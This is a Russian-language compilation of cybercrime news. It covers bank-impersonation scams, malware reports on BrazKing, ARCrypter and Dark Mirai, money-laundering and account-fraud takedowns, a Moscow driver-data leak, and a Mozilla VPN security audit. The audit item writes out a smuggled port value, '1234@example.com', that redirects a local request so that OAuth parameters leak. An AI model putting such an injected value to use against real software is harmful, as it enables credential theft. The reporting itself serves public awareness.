В Витебске мужчина после разговоров с лжесотрудниками банка лишился Br77 тыс. Об этом сообщили в УВД Витебского облисполкома.
"В конце декабря с мужчиной в мессенджере связалась девушка, представилась сотрудницей службы поддержки межбанковского центра, на ее логотипе было подписано "Поддержка". Она пояснила, что зафиксирован несанкционированный вход в интернет-банкинг мужчины, а это значит, что мошенники пытаются похитить его деньги. После непродолжительного общения она перевела разговор на другую линию и разговор продолжил "ведущий специалист юридического отдела межбанковского центра". Он подтвердил, что зафиксирован вход в банкинг и чтобы прекратить действия мошенников, необходимо установить определенное мобильное приложение. В случае передачи кода регистрации это приложение предоставляет удаленное управление устройством. Мужчина так и сделал, но пришедшие на телефон коды никому не сообщал. Разговор завершили на том, что позже они продолжат совместную деятельность по поимке преступников", - рассказали в УВД.
На следующий день продолжился разговор со "специалистом из межбанковского центра", который сказал, что необходимо взять на работе справку о доходах (для зачисления денежных средств в последующем) и приехать в один из банков Витебска. После чего необходимо оформить кредит, что в последующем тот и сделал. Стоит отметить, что в банке его предупреждали о такой схеме обмана. У мужчины возникли сомнения, не общается ли он с мошенниками. Однако кибермошенники прислали в мессенджер фотографии ненастоящих документов: удостоверения сотрудников банка и милиции, документ о том, что только что оформленный кредит аннулирован, а также повестку на следующий день в МВД.
Прибывшему по указанному адресу в Минске мужчине сказали, что указанный в повестке и на фото в удостоверении сотрудник у них не служит, повестку ему никто не направлял. Потерпевший понял, что попался на уловки мошенников и потерял более Br77 тыс., из которых Br65 тыс. взял в кредит на 3 года.
В декабре украинские суды вынесли 228 приговоров по уголовным делам, связанным с интернет-преступностью. Это рекорд всего 2021 года, а кроме того, это почти в полтора раза больше (+46%), чем за аналогичный период годом раньше.
Данные собраны в Едином реестре судебных решений и отображают статистику приговоров, вынесенных украинской судебной системой по преступлениям, связанным с интернетом. Среди них – заказ поддельных документов (ст. 358 УК), интернет-мошенничество (ст. 190), покупка и распространение наркотических веществ (ст. 307, 309), несанкционированное вмешательство в работу компьютерных систем (ст. 361) и нарушения против общественной морали (ст. 301).
Несмотря на то, что преступления, связанные со взломом информационных систем и преступлениями против общественной морали, получили немного меньше приговоров, чем месяцем ранее (-20% и -10%, соответственно), тем не менее, остальные виды преступлений показали достаточно серьезный рост осуждаемости.
Наибольший рост динамики, в сравнении с предыдущим месяцем, показали преступления, связанные с подделкой документов (+28%), наркотиками (+15,7%), а также подделкой документов (+15,7%).
Всего в декабре были наказаны 68 граждан, купивших через интернет поддельные документы. Из них, 44 приговора (64%) вынесены за использование поддельных водительских удостоверений, купленных через интернет. Около четверти всех приговоров за подделку документов (16) получили те, кто купил или участвовал в подделке COVID-сертификатов. Также наказание понесли те, кто купил через интернет удостоверения тракториста-машиниста (4), медкнижки, участника боевых действий и ID-паспорта.
По фактам мошенничества, связанного с интернетом, в декабре были вынесены 22 приговора. Наиболее многочисленными, среди них, были эпизоды подмены и незаконного завладения интернет-заказами на Новой Почте, при получении (6), а также случаи незаконного завладения чужими деньгами с банковских карт или банковских приложений (6).
Также приговоры были вынесены за продажу несуществующих товаров и услуг через OLX (3), Facebook (2), поддельные интернет-магазины (2), а также Instagram (1).
За интернет-преступления, связанные с наркотиками, в декабре были вынесены 125 приговоров: 23 из них получили торговцы, 102 – покупатели. За взлом компьютерных систем были осуждены 4 человека. Все эти эпизоды связаны с перехватом чужих аккаунтов в банковском мобильном приложении Приват24.
Что касается приговоров за преступления против общественной морали, которых в декабре было 9, то 2/3 из них связаны с детской порнографией. Причем, в их число попали не только потребители, но и производители запрещенного контента. Помимо этого, 2 приговора получили девушки, работавшие моделями на онлайн- трансляциях, а также один гражданин, щедро размещавший свои интимные фото на сайте «взрослых» знакомств.
Итоговая картина приговоров, вынесенных интернет-преступникам за 2021 год, выглядит так:
Банковский троян для операционной системы Android BrazKing вернулся в строй с новыми функциями динамического наложения окон поверх легитимных приложений. Обновлённые возможности позволяют вредоносу спокойно работать в системе без необходимости запрашивать подозрительные права.
На новый образец BrazKing наткнулись исследователи из IBM Trusteer, которые отметили, что зловред распространяется на сторонних площадках и через смишинговые СМС-сообщения. В Google Play Store его присутствие пока замечено не было.
Операторы трояна используют старый трюк: пользователя пугают наличием устаревшей и уязвимой версии Android и предлагают скачать APK, который якобы обновит софт до актуального релиза.
После загрузки на устройство жертвы BrazKing запросит лишь одно разрешение — на доступ к специальным возможностям операционной системы (Accessibility Service). Это необходимо вредоносу для снятия скриншотов, записи нажатий клавиш виртуальной клавиатуры и т. п.
Помимо этого, троян выполняет функции софта для удалённого доступа и успешно взаимодействует с банковскими приложениями. BrazKing может читать СМС- сообщения жертв без прав «android.permission.READ_SMS» и перехватывать коды двухфакторной аутентификации.
Ещё одна особенность последних семплов — возможность накладывать свои окна поверх легитимных приложений без доступа к «System_Alert_Window». Именно так троян перехватывает учётные данные, вводимые пользователем.
В новой версии вредоносного приложения исследователи также увидели механизмы сокрытия внутренних ресурсов, для чего применяется XOR-операция с жёстко запрограммированным ключом.
• Source: <http://securityintelligence.com/posts/brazking-android-malware- upgraded-targeting-brazilian-banks/>
Следом за GitHub платформа GitLab [столкнулась](https://about.gitlab.com/blog/2021/05/17/prevent-crypto-mining- abuse/) с атакой, связанной с использованием инфраструктуры проекта для майнинга криповалюты. Для выполнения кода злоумышленники используют runner-ы, при помощи которых можно подключить обработчики при сборке кода проекта в системе непрерывной интеграции. Для блокирования злоупотреблений GitLab ввёл дополнительную проверку, требующую введение номера кредитной карты и выполнение проверочной транзакции (без списания средств). Также введена квота на 400 бесплатных минут работы runner-ов.
Без прохождения данной проверки доступ к функциональности "shared-runner" будет блокироваться. Остальные возможности платформы, включая запуск runner-ов на своих системах, остаются доступны без дополнительной проверки. Проверка будет применяться только для новых пользователей сервиса gitlab.com, зарегистрировавшихся начиная с 17 марта и пользующихся сервисом бесплатно. Ограничения не коснутся платных и поддерживающиих собственные экземпляры GitLab пользователей. GitLab оставляет за собой право распространение проверки и на старых пользователей, если злоупотребления будут фиксироваться в данной категории.
Следствием Главного управления МВД России по Челябинской области обвиняется житель столицы в совершении серии мошенничеств. По предварительным данным, жертвами злоумышленника стали три человека, лишившихся в общей сложности порядка 8 миллионов рублей.
Следствием установлено, что мужчина действовал в составе группы, участники которой совершали обзвон пользователей сотовой связи, проживающих на территории Челябинской области, и путем обмана и злоупотребления доверием выманивали у южноуральцев деньги, принуждая перевести их на подконтрольные банковские счета или на абонентские номера сотовых операторов. В разговоре злоумышленники представлялись работниками банковского сектора или авторитетными финансистами и предлагали вложиться в выгодное приобретение акций известных крупных компаний.
Для осуществления противоправной деятельности обвиняемый на подставных лиц составлял договоры с организациями, предоставляющими услуги телефонной связи, об аренде абонентских номеров. Именно с них осуществлялись впоследствии исходящие звонки соучастниками преступлений жителям не только Челябинской области, но и других регионов Российской Федерации. Мужчину задержали оперативники управления уголовного розыска регионального главка МВД в ходе проведенных мероприятий.
В Главном следственном управлении ГУ МВД России по Челябинской области в отношении 29-летнего злоумышленника расследуется уголовное дело, возбужденное по признакам преступления, предусмотренного частью 4 статьи 159 Уголовного кодекса РФ «Мошенничество». Ему может грозить до десяти лет лишения свободы. Мужчине избрана мера пресечения в виде заключения под стражу.
В настоящее время устанавливается круг лиц, причастных к данным противоправным деяниям.
В Латвии и Литве задержаны 2 подозреваемых, которым вменяется широкомасштабная легализация денег, полученных преступным путем. В частности, "прачек" подозревают в легализации 15 миллионов, которые были получены с помощью фиктивной реновации зданий в Италии, - сообщает eurojust.europa.eu
Работали через сеть подставных компаний
"В ходе международной операции правоохранительные органы Литвы, Латвии и Италии арестовали двух человек, подозреваемых в незаконной легализации 2 млрд евро через финансовое учреждение, ранее работавшее в Литве", - сообщила также Латвийская прокуратура со ссылкой на Евроюст (eurojust.europa.eu).
Двое главных задержанных подозреваются в том, что с 2017-го года незаконно легализовали около 2 млрд евро через глобальную сеть подставных компаний.
Предположительно они предоставляли интернет-услуги по легализации незаконно полученных денег.
Еще один подозреваемый, лидер другой организованной преступной группы, был арестован в Италии в ходе этой операции.
Судя по всему, этот подозреваемый мог обманным путем получить 15 млн евро государственных средств от государственных структур Италии.
И эти средства, возможно, были легализованы через ту же сеть подставных компаний, связанных с финансовым учреждением, ранее работавшим в Литве.
Деятельность этого учреждения электронных платежей была закрыта в 2022 году. У него была отозвана банковская лицензия и начата процедура банкротства за несоблюдение правил предупреждения отмывания денег.
Отмывались деньги мошенников и наркоторговцев
Как сообщает Евроюст, финансовое учреждение в Литве предлагало услуги по "отмыву" тысячам преступников в ЕС путем проведения фиктивных финансовых операций через сеть подставных компаний.
Предприятие рекламировало свои якобы консультационные услуги в интернете и было создано в Литве в 2016 году предположительно членами итальянской организованной преступной группы.
Финансовое учреждение возглавляли двое основных подозреваемых - граждане Италии, проживавшие в Литве и Латвии.
Таким образом члены организованной преступной группы незаконно "отмывали" деньги от различных преступлений, включая уклонение от уплаты налогов, мошенничество в интернете и торговлю наркотическими и психотропными веществами.
Часть денег, полученных в результате преступной деятельности, была инвестирована в Латвии и Литве путем покупки недвижимости и авто.
Афера с утеплением зданий: увели 15 млн
Среди незаконно "отмытых" средств были 15 млн евро, полученные от итальянских властей за, возможно, незаконное получение государственной помощи на реновацию зданий, которая на самом деле не проводилась.
Главным подозреваемым в этом мошенничестве был налоговый консультант, который организовал подачу заявок на получение этой помощи 72 лицами, которые былли в курсе происходящих злоупотреблений. Помощь от государства была предназначена для работ по утеплению зданий, другие энергосберегающие мероприятия, ремонты.
Расследование деятельности этой преступной группы было начато в Италии, в прокуратурах Неаполя и Лечче, а также в Латвии.
18 задержаний за две недели
Госполиция сообщает, что операция продолжается. За последние 2 недели было арестовано в общей сложности 18 человек.
В международной операции участвовали около 250 сотрудников правоохраны Литвы, Италии и Латвии.
В общей сложности было арестовано семь человек, 11 подозреваемых помещены под домашний арест, проведено 55 обысков, заморожены активы на сумму 11,5 млн евро.
В 2021 году расследование начала прокуратура Неаполя и Лече в Италии, а в 2022 году через Евроюста привлечены следователи из Латвии и Литвы.
Быстрая реакция властей Латвии и Литвы на подозрительные сделки позволила идентифицировать и вовремя заморозить миллионы, а также конфисковать недвижимость и транспортные средства класса люкс.
Евроюст и Европол сыграли ключевую роль в содействии и координации международной деятельности. В ходе расследования Евроюст поддержал создание и финансирование совместной следственной группы между всеми задействованными госорганами. Всего было проведено восемь координационных совещаний для подготовки к операции учреждений Италии, Латвии и Литвы. Эти подготовительные работы также предотвратили возможные конфликты юрисдикции. В результате Евроюст способствовал возврату Италии замороженных властями Литвы средств на сумму более 3 млн евро.
Участники этой операции
Италия: прокуратуры Неаполя и Лече, Финансовая полиция Италии (Guardia di
Finanza);
Латвия: Генеральная прокуратура, прокуратура Рижского судебного округа, 1-й
отдел управления по борьбе с экономическими преступлениями Главного управления
криминальной полиции Государственной полиции;
Литва: Вильнюсская окружная прокуратура и Вильнюсское окружное управление
полиции.
sc: eurojust.europa.eu/news/full-scale-action-against-eur-2-billion-money- laundering-network-lithuanian-financial
750 млн. аккаунтов способствовали массовым киберпреступлениям в сети.
Microsoft объявила о масштабной операции против киберпреступной группы, известной как Storm-1152, ответственной за создание около 750 миллионов поддельных аккаунтов Microsoft. Эти аккаунты и связанные с ними веб-сайты использовались для различных киберпреступлений. Данная информация была опубликована на официальном сайте компании.
Заявление о ликвидации группировки последовало вскоре после того, как Microsoft получила постановление суда Нью-Йорка, разрешающего компании изъять инфраструктуру и веб-сайты, используемые Storm-1152, находящиеся на территории США. В Microsoft заявили, что действия Storm-1152 значительно облегчали проведение злонамеренных действий для множества киберпреступников.
Группа Storm-1152 выделялась на фоне других благодаря своей специализации в сфере киберпреступности как услуги, предлагая фальшивые аккаунты Microsoft и услуги по обходу системы CAPTCHA. По данным Microsoft, деятельность Storm-1152 принесла «миллионы долларов незаконных доходов» и обошлась компании и другим пострадавшим ещё дороже для борьбы с их преступлениями.
Расследование также выявило ряд лиц из Вьетнама, которые играли ключевую роль в разработке и поддержке веб-сайтов, связанных с деятельностью Storm-1152. Эти лица создавали обучающие видео и предоставляли поддержку в чате для своих продуктов при эксплуатации поддельных аккаунтов Microsoft.
YouTube-канал вьетнамца с видеоинструкциями по обходу мер безопасности
Исследователи Microsoft также выявили, что несколько групп, занимающихся вымогательством и кражей данных, использовали аккаунты Storm-1152. В частности, упоминается Scattered Spider (UNC3944) – группа молодых хакеров, известных взломами крупных компаний, таких как MGM Resorts и Caesars Entertainment .
Microsoft смогла изъять hotmailbox[.]me, веб-сайт, на котором продавались аккаунты Microsoft со всего мира. Скриншот сайта показывает, что аккаунты продавались за доли цента. При этом каждый аккаунт был уникальным и продавался только один раз.
Скриншоты сайтов Storm-1152
Microsoft заявила, что способность компаний быстро определять и закрывать мошеннические аккаунты заставляет преступников искать новые способы обхода системы безопасности. Покупка аккаунтов у групп вроде Storm-1152 позволяет им сосредоточить усилия на фишинге, спаме, вымогательстве и других видах мошенничества.
В рамках операции также были нарушены действия нескольких других сервисов, включая 1stCAPTCHA, AnyCAPTCHA и NoneCAPTCHA. Microsoft сотрудничала с Arkose Labs для исследования и принятия мер против группы Storm-1152.
source:
blogs.microsoft.com/on-the-issues/2023/12/13/cybercrime-cybersecurity-
storm-1152-fraudulent-accounts
landingpage-h0gcc3bvhkd2aaez.z01.azurefd.net/notice-of-pleadings
Главным управлением цифрового развития предварительного следствия Следственного комитета совместно с ГУПК МВД установлена причастность 19-летнего жителя Витебска к незаконному распространению реквизитов доступа к банковским счетам. Они использовались преступными группами при совершении хищений денежных средств белорусских граждан через Интернет.
За каждую «сделку» по продаже реквизитов доступа к расчетному счету молодой человек получал денежные средства в размере от 25 до 140 рублей. Общий преступный доход составил более 4000 белорусских рублей.
В указанную преступную деятельность молодой человек вовлек более 60 лиц, которые также получали незаконный доход за передачу своих паспортных данных и абонентских номеров для регистрации личных кабинетов в интернет-банкинге. При этом некоторые из них оказывали содействие подозреваемому и подыскивали для него новых «дропов».
В настоящее время в отношении основного фигуранта возбуждено 15 уголовных дел, предусмотренных статьей 222 Уголовного кодекса Республики Беларусь. Санкция статьи предусматривает наказание до 10 лет лишения свободы. Действиям остальных лиц, участвовавших в преступной схеме, будет дана правовая оценка в ходе предварительного следствия.
В ходе допросов подозреваемый и вовлеченные им в противоправную деятельность лица подробно рассказали о незаконном способе заработка и раскаялись в содеянном.
Расследование продолжается.
• Source: sk.gov.by/ru/news-ru/view/vyjavlena-i-presechena-dejatelnost- ocherednogo-dropovoda-13235/
Масштабная схема работала с января 2019-го по февраль 2023 года на территории Омской, Новосибирской и Свердловской областей. Преступное сообщество из девяти жителей и совершило 69 эпизодов хищений на общую сумму 160 миллионов рублей.
По версии следствия, аферисты через объявления в интернете находили граждан, которым банки отказывались выдавать кредиты. Их оформляли как сотрудников частных компаний и подключали к зарплатным проектам кредитных организаций, тем самым создавая иллюзию об их платежеспособности.
Мошенникам помогали сотрудницы банков, которые вносили недостоверные данные в документы. Затем участники ОПГ получали кредиты и похищали их.
Правительство Новой Шотландии предупреждает общественность о «глобальной проблеме кибербезопасности», которая привела к краже личной информации. Но во время пресс-конференции в воскресенье днем ответственный министр кабинета министров не сказал, какая информация была украдена или сколько людей пострадало.
Четыре из пяти дропов в Южно-Африканской Республике (ЮАР) представляют поколения миллениалов и зумеров. Об этом сообщает местное издание Daily Maverick со ссылкой на чиновников, занимающихся борьбой с преступностью. В частности, по данным исполнительного директора Южноафриканской службы предотвращения мошенничества Мани ван Шалквика (Manie van Schalkwyk), 78,5 процента дропов в стране — в возрасте от 20 до 40 лет, а еще 13,7 процента — от 40 до 50 лет.
Также местные исследователи провели анализ расовой принадлежности дропов. По их данным, 86 процентов — негры, восемь процентов — белые, четыре процента — цветные, а оставшиеся два процента — либо индейцы, либо их раса осталась неизвестной.
«Вероятность вовлеченности мужчин в этот бизнес в два раза выше, чем женщин, при этом 67 процентов дропов были мужского пола. Стоит отметить, что 93,7 процента дропов не состояли в браке, из чего можно сделать вывод, что неженатые и незамужние люди в 16,6 раза чаще бывают вовлечены именно в этот вид незаконной деятельности», — констатировал ван Шалквик.
При этом известно, что 77 процентов южноафриканских дропов зарабатывали своей работой не более 10 тысяч рандов в месяц (примерно 41,3 тысячи рублей), и только девять процентов получали ежемесячно более 20 000 рандов (82,6 тысячи рублей). Более половины дропов (54 процента) живут всего в трех муниципалитетах — Йоханнесбурге, Экурхулени и Этеквини.
Основным направлением работы для южноафриканских кардеров и мошенников остается Австралия. Управляющий директор Австралийской биржи финансовых преступлений Дэвид Пегли (David Pegley), констатирует, что еще полтора года назад пять крупнейших банков страны еженедельно сталкивались со 100 тысячами случаев мошенничества. Однако теперь этот показатель вырос до 140 тысяч.
source: msn.com/en-za/news/other/gen-zs-from-joburg-the-most-susceptible-to- money-mule-recruitment-stats-show/ar-AA1bjKCr
Об операторах ничего не известно, а вектор атаки продолжает быть загадкой.
Ранее неизвестная программа-вымогатель ARCrypter, которая скомпрометировала
ключевые организации в Латинской Америке, теперь расширяет свои атаки по всему
миру.
Исследователи в своем новом отчете связали ARCrypter с атакой на госучреждение Чили в октябре , которая привела к приостановке работы ведомства.
По словам экспертов The BlackBerry Research and Intelligence Team , ARCrypter в настоящее время расширяет свою деятельность за пределами Латинской Америки и нацелен на различные организации по всему миру, в том числе в Китае, Канаде, Германии, США и Франции.
Требования выкупа в каждом случае варьируются и достигают $5000. Эксперты объясняют это тем, ARCrypter является программой-вымогателем среднего уровня.
BlackBerry сообщает, что первые образцы ARCrypter появились в начале августа 2022 года, за несколько недель до атаки в Чили.
Вектор атаки остается неизвестным, но аналитики смогли найти 2 URL-адреса
AnonFiles, которые используются в качестве удаленных серверов для получения
архива «win.zip», содержащего исполняемый файл «win.exe».

Исполняемый файл представляет собой файл-дроппер, содержащий ресурсы BIN и HTML. HTML содержит записку о выкупе, а BIN включает в себя зашифрованные данные, для которых требуется пароль.
Если пароль указан, BIN-файл создает на скомпрометированном устройстве
случайный каталог для хранения полезной нагрузки второго этапа ARCrypter,
которая создает собственный раздел реестра для сохранения постоянства в
системе.

Затем ARCrypter удаляет все теневые копии томов, чтобы предотвратить
восстановление данных, изменяет сетевые настройки для обеспечения стабильного
подключения, а затем шифрует файлы, кроме определенных типов.

Файлы в папках «Загрузки» и «Windows» также пропускаются, чтобы не сделать систему полностью непригодной для использования.
Помимо расширения «.crypt», зашифрованные файлы отображают сообщение «ALL YOUR FILES HAS BEEN ENCRYPTED».

Примечательно, что вымогатели утверждают, что они крадут данные во время своих
атак, но у них нет сайта утечки для публикации украденных файлов.
В настоящее время операторах ARCrypter почти ничего не известно – их
происхождение, язык и потенциальные связи с другими группировками
Уязвимость в веб-интерфейсе управления Cisco Unified Contact Center Management Portal (Unified CCMP) и Cisco Unified Contact Center Domain Manager (Unified CCDM) может позволить авторизованному удаленному злоумышленнику повысить свои привилегии до Администратора.
Эта уязвимость связана с отсутствием проверки разрешений пользователей на стороне сервера. Злоумышленник может воспользоваться этой уязвимостью, отправив поддельный HTTP-запрос на уязвимую систему. Успешная эксплуатация может позволить злоумышленнику создать учетную запись администратора. С помощью этих учетных записей злоумышленник может получить доступ и изменить ресурсы телефонии и пользователей на всех платформах Unified, связанных с уязвимым Cisco Unified CCMP. Для успешной эксплуатации этой уязвимости злоумышленнику потребуются действительные учетные данные расширенного пользователя.
Source: [https://tools.cisco.com/security/ce...urityAdvisory/cisco-sa-ccmp- priv-esc- JzhTFLm4](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco- sa-ccmp-priv-esc-JzhTFLm4)
В прошлом месяце TP-Link устранила критическую уязвимость в роутерах TL-WR840N (EU) v5, популярных у домашних пользователей. Не прошло и двух недель, как дыру уже взяли на вооружение операторы одного из актуальных IoT-ботнетов — Dark Mirai, он же Manga и Dark.IoT.
Причиной появления уязвимости CVE-2021-41653, получившей 9,8 балла по шкале CVSS, является неадекватная санация пользовательского ввода на стороне сервера. Эксплойт позволяет с помощью вредоносных запросов захватить контроль над устройством.
Автор находки подчеркнул, что без аутентификации атака невозможна, однако в тех случаях, когда доступ к устройству можно получить через дефолтный пароль, это не проблема.
Проведенный в Fortinet анализ обновленного Dark Mirai [показал](https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai- based-campaign-targets-new-tp-link-router-rce-vulnerability), что в результате эксплойта на роутер загружается вредоносный скрипт tshit.sh. Он проверяет используемую архитектуру (x86, MIPS, ARM и проч.) и скачивает соответствующую полезную нагрузку.
Во избежание конкуренции зловред блокирует порты, которые обычно используют ботоводы. После этого он готов к выполнению команд на проведение DDoS-атак. Согласно результатам анализа, Dark Mirai поддерживает более десятка техник — SYN, DNS, UDP и TCP flood (в последнем случае с фрагментированием пакетов и без), DNS с отражением и усилением трафика и т. п.
В настоящее время в интернете активны несколько DDoS-ботнетов, составленных в основном из роутеров (BotenaGo, Mēris). В Fortinet решили отслеживать Dark Mirai, так как он один из самых активных. К тому же его арсенал постоянно обновляется, и добавление эксплойтов осуществляется очень оперативно.
По данным экспертов, Dark Mirai объявился в интернете в феврале этого года. Летом он засветился в атаках на сетевые устройства, работающие на прошивках Arcadyan и Realtek. В обоих случаях уязвимости были взяты на вооружение за считаные дни после выхода патча. DDoS-атак с этого ботнета в Fortinet пока не зафиксировали.
В отделение МВД России по г. Мыски обратился 62-летний электрослесарь одного из промышленных предприятий. Мужчина сообщил, что неизвестный похитил у него крупную сумму денег.
Полицейские выяснили, что накануне потерпевшему на мобильный телефон позвонил неизвестный, представился сотрудником банка и сообщил, будто в Москве злоумышленники оформили от его имени кредит. Собеседник настоятельно рекомендовал жителю Мысков как можно быстрее самому подтвердить заявку на заем и перевести все деньги на «безопасный» счет. После того, как потерпевший выполнил инструкции незнакомца и перечислил более 1,3 млн рублей, тот убедил его установить на смартфон приложение удаленного доступа, после чего со счета электрослесаря были похищены еще 2,2 млн рублей. Несмотря на это, потерпевший продолжил общение со злоумышленником и по его указанию оформил в различных банках еще два крупных кредита и перечислил деньги на указанные ему счета. Общая сумма причиненного ему ущерба составила около 6,2 млн рублей.
Только после того, как злоумышленник перестал отвечать на телефонные звонки, мужчина понял, что стал жертвой преступления, и сообщил о произошедшем в полицию.
В настоящее время сотрудники уголовного розыска проводят комплекс оперативно- розыскных мероприятий, направленных на установление подозреваемого. Следователем отделение МВД России по г. Мыски возбуждено уголовное дело по признакам преступления, предусмотренного ч. 4 ст. 158 УК РФ «Кража». В качестве максимальной меры наказания санкции статьи предусматривают 10 лет лишения свободы.
Hackers are selling a stolen database containing 50 million records of Moscow driver data on an underground forum for only $800.
According to Russian media outlets that purchased the database, the data appears to be valid and contains records collected between 2006 and 2019
Russian news publisher Kommersant called a small sample of the exposed individuals and confirmed that the stolen data is accurate, even if outdated in some cases.
The database contains the following details on Moscow car owners:
As a bonus to buys, the seller provides an additional file containing information collected in 2020, which stops when Russia moved from regional databases to a central storage system in the Federal Information System (FIS) of the State Traffic Safety Inspectorate.
This matches the alleged source, which according to the database seller is an insider from the Moscow traffic police department.
The Moscow authorities have not commented on this scenario yet, and Russian analysts are divided on who is responsible for the breach.
Some experts believe the hackers exfiltrated the data by exploiting a vulnerability in the system's software, while others are certain an insider caused the leak.
Alexei Parfentiev, head of the analytics department at SerchInform, stated “The insider job looks more likely because the requirements of regulators on internal structures in the traffic police are less strict than those that concern protection from external attacks.”
An analyst at InfoWatch Group offers a different perspective, claiming that cyberattacks on car insurance companies are also a likely explanation, as all of the exposed details are found in these firms' systems.
This is not the first or even the second time that hackers have leaked the data of millions of Moscow motorists on the dark web.
In August 2020, a similar albeit smaller (1 million records) pack was made available on hacking forums, selling for $1,500.
In May 2020, a threat actor offered another Russian car owners database for $2,800, or [$14,000](https://www.vedomosti.ru/technology/articles/2020/05/14/830287-baza- avtovladeltsev) if anyone paid extra for exclusive access to the data.
The most recent and more significant listing sells for less because it consists of mostly older data, and many of the details will be no longer valid and less usable by malicious actors.
However, this data can still be valuable to other threat actors as it allows them to conduct targeted phishing campaigns against the exposed individuals, leading to financial or credentials theft.
https://www.bleepingcomputer[.]com/...-data-for-millions-of-moscow-drivers- for-800/
达索猎鹰猎猎是法国重要的公司,被攻击了,263G数据泄露
TG : @marketo_leaks
我无法下载数据,失败,为什么?
Компания Mozilla [объявила](https://blog.mozilla.org/en/mozilla/news/mozilla- vpn-completes-independent-security-audit-by-cure53/) о завершении независимого аудита клиентского ПО для подключения к сервису Mozilla VPN. В ходе аудита был выполнен анализ обособленного клиентского приложения, написанного с использованием библиотеки Qt и поставляемого для Linux, macOS, Windows, Android и iOS. Работу Mozilla VPN обеспечивает более 400 серверов шведского VPN-провайдера Mullvad, размещённых в более чем 30 странах. Подключение к VPN- сервису производится при помощи протокола WireGuard.
Аудит выполнен компанией Cure53, в своё время проводившей аудит проектов NTPsec, SecureDrop, Cryptocat, F-Droid и Dovecot. Аудит затрагивал проверку исходных текстов и включал проведение тестов для выявления возможных уязвимостей (вопросы, связанные с криптографией не рассматривались). В ходе проверки выявлено 16 проблем с безопасностью, 8 из которых имели характер рекомендаций, 5 присвоен низкий уровень опасности, двум - средний, а одной - высокий.
При этом лишь одна проблема со средним уровнем опасности была отнесена к категории уязвимостей, так как только она была пригодна для эксплуатации. Указанная проблема приводила к утечке сведений о применений VPN в коде для определения captive portal из-за отправки незашифрованных прямых запросов по HTTP, передаваемых вне VPN-туннеля и раскрывающих основной IP-адрес пользователя в случае если атакующий может контролировать транзитный трафик. Проблема решается отключением режима определения captive portal в настройках.
Вторая проблема среднего уровня опасности связана с отсутствием должной чистки
нечисловых значений в номере порта, что позволяет организовать утечку
параметров аудентификации OAuth через подмену номера порта на строку вида
"1234@example.com", что приведёт к установке тега
,
обращающегося к example.com вместо 127.0.0.1.
Третья проблема, помеченная как опасная, позволяет любому локальному приложению без аутентификации обратиться к VPN-клиенту через WebSocket, привязанный к localhost. В качестве примера показано, как при активном VPN- клиенте любой сайт мог организовать создание и отправку скриншота через генерацию события screen_capture. Проблема не отнесена к категории уязвимостей, так как WebSocket использовался только во внутренних тестовых сборках и применение данного канала связи лишь планировалось в будущем для организации взаимодействия с браузерным дополнением.
Агентство Reuters сообщило , что уязвимость в программном обеспечении Apple, которую израильская компания NSO Group использовала для взлома iPhone в 2021 году, использовала ещё одна компания - QuaDream.
QuaDream - это израильская фирма, менее известная, чем NSO, которая также разрабатывает инструменты для взлома смартфонов.
По словам пяти источников издания, в прошлом году две конкурирующие компании получили такую же возможность удаленно взламывать iPhone, что означает, что обе фирмы могут взломать телефоны Apple без необходимости открытия вредоносной ссылки владельцем. По словам одного эксперта, тот факт, что две фирмы использовали одну и ту же сложную технику взлома, известную как «нулевой клик», показывает, что телефоны более уязвимы для мощных инструментов цифрового шпионажа, чем это допускает отрасль.
Эксперты, анализирующие средства взлома, разработанные NSO Group и QuaDream, с прошлого года, утверждают, что обе компании использовали очень похожие подходы. Чтобы получить несанкционированный доступ к данным, они атаковали определённые уязвимости в программном обеспечении аппарата, скрытые глубоко внутри платформы обмена мгновенными сообщениями Apple. Кроме того, они использовали сопоставимые подходы для внедрения вредоносного программного обеспечения на целевые устройства.
Исследователь безопасности из компании Citizen Lab, изучающий инструменты для взлома NSO Group и QuaDream, заявляет, что их возможности находятся практически на одном уровне. ПО для взлома iPhone через iMessage от NSO Group и QuaDream было настолько похоже, что когда Apple закрыла основные уязвимости, которые использовала программа Pegasus, шпионский продукт QuaDream тоже оказался неэффективным, по словам двух человек, знакомых с этим вопросом.
Пресс-служба NSO категорически отвергла факт сотрудничества с QuoDream и отметила, что индустрия кибершпионажа продолжает стремительно развиваться во всём мире. Компания QuaDream не пожелала комментировать свою деятельность журналистам информагентства Reuters. Представитель Apple также отказался от комментариев.
• Source: [https://www.reuters.com/technology/...y-second-israeli-spy-firm- sources-2022-02-03/](https://www.reuters.com/technology/exclusive-iphone-flaw- exploited-by-second-israeli-spy-firm-sources-2022-02-03/)
• Source: [https://www.timesofisrael.com/secon...oited-apple-flaw-to-hack- into-iphones-report/](https://www.timesofisrael.com/second-israeli-company- exploited-apple-flaw-to-hack-into-iphones-report/)
В дежурную часть УМВД России по г. Нижневартовску обратилась местная жительница 1960 года с заявлением о мошенничестве. Женщина рассказала, что попалась на уловку злоумышленников, завлекающих рекламой легкого заработка в Интернете.
По словам потерпевшей в социальной сети «Facebook» она увидела рекламу «Инвестиции для пенсионеров». Данное предложение ее заинтересовало и, перейдя по ссылке, она указала свой контактный абонентский номер для обратной связи. С ней связался неизвестный, который представился финансовым специалистом инвестиционной компании группы «ВТБ Банк» Дмитрием Соболевым. Мужчина рассказал об условиях участия в торгах, а также представил трейдера. Для удобства общения с трейдерами Дмитрий предложил использовать приложение «Skype».
По указанию Алексея женщина зарегистрировалась на сайте «http://trade.lega-l.com» и перевела первый депозит в размере 20 000 рублей на счет «QIWI Кошелька». Под руководством трейдеров заявительница начала проводить сделки, в ходе торгов ей удалось получить первую прибыль в размере 1496,36 рублей. На этом женщина не остановилась, продолжала переводить депозиты и осуществлять торги, производя операции по переводу денежных средств на банковские счета неизвестных ей лиц. Чтобы удержать пенсионерку «на инвестициях» аферисты переводили на счет женщины прибыль от сделок. Азарт быстрого заработка привел к тому, что вартовчанка переводила крупные суммы на счета банковских карт мошенников, используя личные сбережения, а также оформила потребительский кредит.
Спустя время на электронную почту потерпевшей поступило сообщение с информацией о блокировке депозитного счета и требованием пополнения счета на сумму 1000000 рублей. Пенсионерка перевела 400000 рублей, но трейдер сообщил, что данной суммы недостаточно для разблокировки счета, тогда потерпевшая обратилась в полицию.
Общий ущерб составил 2 904 764 рублей.
По данному факту возбуждено уголовное дело по ч 4 ст.159 УК РФ.
Израильтянин, проживающий в деревне Савара на оккупированных территориях, был арестован в воскресенье по подозрению в мошенничестве в взимании с многих граждан денег за отправленные им фиктивные посылки, выдавая себя за почтовую администрацию.
